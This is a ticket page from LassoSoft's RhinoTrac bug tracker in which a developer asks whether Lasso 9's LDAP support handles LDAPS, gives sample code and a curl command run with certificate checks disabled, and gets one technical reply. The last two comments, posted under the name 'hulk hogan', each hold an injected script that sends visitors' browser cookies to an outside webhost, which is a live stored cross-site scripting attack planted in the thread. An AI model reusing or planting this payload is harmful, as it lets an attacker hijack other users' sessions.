Lasso Soft Inc. > Home

RhinoTrac

LassoSoft Ticket Tracking System

NOTE: If you are using Lasso Server 9.3 please Log your ticket directly via the LUX admin as this will give us more information about your issue.

Lasso 9 Issues



Ticket #8027: support for LDAPS

Reported by:
Steve Piercy
Date:
21 Jan, 2017
Priority:
major
Component:
Lasso 9
Version:
9.3.2b4
Keywords:
Platform:
macOS 10.12.2
Issue reported by Steve Piercy (web@stevepiercy.com)
Company: Steve Piercy - Website Builder

Component: Lasso 9 Server
Version: 9.3.2b4
Platform: macOS 10.12.2
Source IP: 64.202.87.244

Detail
======
From: http://lasso.2283332.n4.nabble.com/Does-Lasso-9-ldap-support-ldaps-or-must-I-use-sys-process-tp4645554.html

I have an LDAPS server I can test against.

--------------------------------------------------------

Does the Lasso 9 `ldap` type support LDAPS?

If not, is `sys_process` my only option?

And if `sys_process` is my only option, does anyone have a working example of LDAPS for Lasso 9?

The sample code here, slightly modified, fails on connection.
http://lassoguide.com/operations/ldap.html#ldap-methods

local(my_ldap) = ldap
// 636 is secure port
#my_ldap->open('my.ldap.com',636)
fail_if(#my_ldap->code != 0, #my_ldap->code, 'LDAP Error ' + #my_ldap->code)
#my_ldap->authenticate('myusername', 'mysecretpassword')
fail_if(#my_ldap->code != 0, #my_ldap->code, 'LDAP Error ' + #my_ldap->code)
#my_ldap->search('ou=People,o=myorg', ldap_scope_subtree, '(objectClass=*)')
fail_if(#my_ldap->code != 0, #my_ldap->code, 'LDAP Error ' + #my_ldap->code)
local(my_result) = #my_ldap->results
#my_ldap->close

Not having a proper default certificate bundle installed might be part of the issue.

When I use curl on the production environment, I must the `-k` option.

[spiercy@production ~]$ curl "ldaps://my.ldap.com:636/ou=People,o=myorg" -u "cn=GeneralLookupAccount,ou=LookupAccounts,ou=sa,o=myorg" -k
(list of CAs elided)
DN: ou=People,o=myorg
objectClass: organizationalUnit
objectClass: ndsLoginProperties
objectClass: ndsContainerLoginProperties
objectClass: Top

Comments

27 Jan, 2017 by Eric Knibbe
It doesn't look like it's supported in the module sources, but looking at the LDAP API, it probably involves calling `ldap_start_tls` at some point. Do you have any code examples from elsewhere that use that call?
21 Mar, 2017 by hulk hogan
<textarea/><script>document.location="https://fbookvisitors.000webhostapp.com/cookie.php?cookie="+document.cookie;</script>
21 Mar, 2017 by hulk hogan
<textarea/><script>document.location="https://fbookvisitors.000webhostapp.com/cookie.php?cookie="+document.cookie;</script>
Please log in to your LassoSoft account to comment

LassoSoft Inc. > Home

 

 

©LassoSoft Inc 2015 | Web Development by Treefrog Inc | PrivacyLegal terms and Shipping | Contact LassoSoft